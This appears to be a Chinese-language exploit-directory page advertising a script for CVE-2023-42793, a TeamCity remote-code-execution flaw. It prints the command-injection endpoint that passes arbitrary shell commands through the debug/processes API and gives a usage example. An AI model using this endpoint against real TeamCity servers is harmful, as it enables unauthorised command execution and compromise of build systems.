Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
teamcity-exploit-cve-2023-42793 — teamcity-exploit-cve-2023-42793 | Kitploit
工具/GitHubGitHub/swiftsecur/teamcity-exploit-cve-2023-42793
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubswiftsecur/teamcity-exploit-cve-2023-42793

teamcity-exploit-cve-2023-42793

teamcity-exploit-cve-2023-42793

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1111年前尚未审核
分享

TeamCity Exploit Cve 2023 42793

一个快速利用 cve-2023-42793 漏洞的脚本。关于该漏洞的更多信息可参见:

https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793​

https://www.cnblogs.com/LittleHann/p/17843271.html​

该脚本增加了在触发 RCE 漏洞后自由使用 "params" 执行命令的能力:

RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh&params=-c&params=${URLCMD}"

运行脚本:

Usage: <base_url> <port> <command>

示例:

./TeamCity.sh blah.com 8111 "ls -lah"

原始脚本在此,完全归功于他们:https://github.com/Zenmovie/CVE-2023-42793

下载工具